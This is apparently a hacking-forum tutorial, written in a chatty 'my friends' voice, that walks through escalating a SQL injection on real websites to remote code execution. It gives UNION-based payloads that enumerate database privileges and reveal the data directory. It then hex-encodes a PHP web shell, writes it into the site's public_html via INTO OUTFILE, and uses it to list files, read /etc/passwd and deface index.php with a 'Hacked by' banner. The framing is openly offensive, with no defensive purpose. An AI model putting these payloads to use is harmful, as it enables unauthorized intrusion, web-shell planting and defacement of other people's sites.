Hello my friends, I hope you are well. Today, I am with you again. In the previous post, I told you about the 'Sql Injection to Lfi' incident, today I will tell you about the 'Sql injection to RCE' incident, in fact, our incident is very simple, we will follow a simple explanation in order not to confuse you.
First of all, my friends, we are entering a website that has a 'Sql injection' vulnerability.
We get to the 'Union All Select' section, the number values will be reflected.
Follow the steps from here, my friends, you see that the value '6' is reflected on the site where I am currently performing my transactions.
This means that we will perform transactions with the value '6'.
6 We come to our value, move our mouse over it, click on the value and it will be blue.
Then repeat the steps I followed, my friends.
We hover over our '6' value, my friends, we delete the '6' value and paste the following command.
Code : (SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTAB LE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVIL EGES)
Or ..
Code 2 : CONCAT(0x44617461646972203a,@@datadir,0x3c62723e43 757272656e742055736572203a,user(),0x3c62723e3c6872 3e,(SELECT+GROUP_CONCAT(user,0x3a,file_priv+SEPARA TOR+0x3c62723e)+FROM+mysql.user))
After pasting, a screen like this will appear. If you do not see a text like the one below, it looks like this:
"'root'@'localhost' -> YES" As you can see, my friends, it tells us that many permissions such as "Read, write, print" are open here.
But if you see the expression "'root'@'localhost' -> NO" like this, it means that these permissions are disabled. As I said, this does not happen on every website, it is an exception, my dear friends.
Now, my friends, we can extract the following statement from here, which means that many permissions such as "Read, write, print" are open.
Reading: What I mean by reading is that we can read files that we should not see. This can exploit the vulnerability in the previous location called 'LFI'.
Writing, Printing: Friends, the expression writing here means changing the content of a file. Imagine doing something like this, we can embed the text we want, let's skip the text, the commands we want into our target file.
I hope you understand the logic, there is no chance you won't anyway.
Now my friends, what we need to do is a very simple process, all that remains is to find the directory path. Every website has a directory address. For example, when you put quotes, 'Indexed' may give 'Sql' error. This is the first method of finding directories.
You see, my friends, I put quotation marks on a random site, it gave me its directory and stated that there was a mistake here, friends, it is actually a matter of luck.
Directory: "D:\Apache24\htdocs\home\backend\class\class_db.ph p"
My friends, this is the directory address, after finding the directory address, we may need to restore the directory to perform the 'Print' operation. The 'Home Directory' of the 'Directory' address, that is, if the site is 'Linux Server', it starts with 'Public_html', if the website is 'Windows', it starts with 'Htdocs' .
So these are the main directories. If you don't understand anything from here, let me show you this way. Since your target is mainly 'Linux' systems, I will show it this way.
'
www.google.com/ahmet/polis/baskını/yedi/geçmisolsun.php' friends, take a guess what is the main directory address of this site, isn't it directly '
www.google.com/burasinin.php' here friends, if the website is ' If it's Linux, the part in the URL I showed is 'Public_Html'
Let's restore our directory, friends. The directory of the address I entered as the current target is as follows.
"/home/censorship/public_html/censorship/db.class.php" I am restoring my directory "/home/censorship/public_html/"
Yes, my friends, the restoration work has been completed successfully, the only thing we need to do now is as follows.
Let's delete the codes in our value '6', then my friends, find a shell somewhere on the internet or use the command I gave below directly, my friends.
Code: <?php echo system($_GET['sex']); ?>
Now we paste this code into our '6' value reflected below. It should look like this.
Yes, we pasted it, everything is ok, now my friends, we select all the commands in the value '6', keep them blue.
There is a '0xHEX' Button below, we click on that button while our code is blue.
Yes, our code is 'Hex'. I'm sharing it below in case we have friends who don't want to bother.
Code: 0x3c3f706870206563686f2073797374656d28245f4745545b 27736578275d293b203f3e
Now my friends, all I have to do is add our own directory address to the command I gave below.
Code: +INTO+OUTFILE+'/var/www/html/pescyte.php' Yes, friends, the directory is here, now we are adding our own directory.
Before : +INTO+OUTFILE+'/var/www/html/pescyte.php'
After : +INTO+OUTFILE+'/home/censorship/public_html/sex.php'
My friends, something will attract your attention, our directory was up to public_html, why did you add 'Sex.php', you will ask, friends, we wrote a command and made this command our own.
We will put it into a file he created.
That's why it says 'Sex.php' there, you can add a file called 'Illegal.php' there, it's a matter of preference my friends.
Now all we have to do, my friends, is follow the step below.
As you can see, my friends, I pasted our 'After' code one place behind the "--+" place at the end.
All we have to do is say 'Execute' and then see the results together.
Yes, our file has arrived, we will direct it by running commands from here.
Yes, I wrote our 'Ls' command and the files or data in the directory we were in were listed.
Yes, I typed 'Cat /etc/passwd' and it read 'Passwd' and displayed it.
This time, my friends, I wrote the following command in the URL.
Code : Echo <center><h1>Hacked by P30w4ll & BeyaZ / #İllegalPlatform.Co Education Index</center></h1> > index.php
As soon as I approve, these articles will appear on the home page, let's see, my friends.
Yes, friends, articles appeared and we uploaded the shell with a simple method without entering the admin panel.
I see my friends, you just like it, please comment, if I don't get a lot of likes + comments, I will stop posting topics for a while.
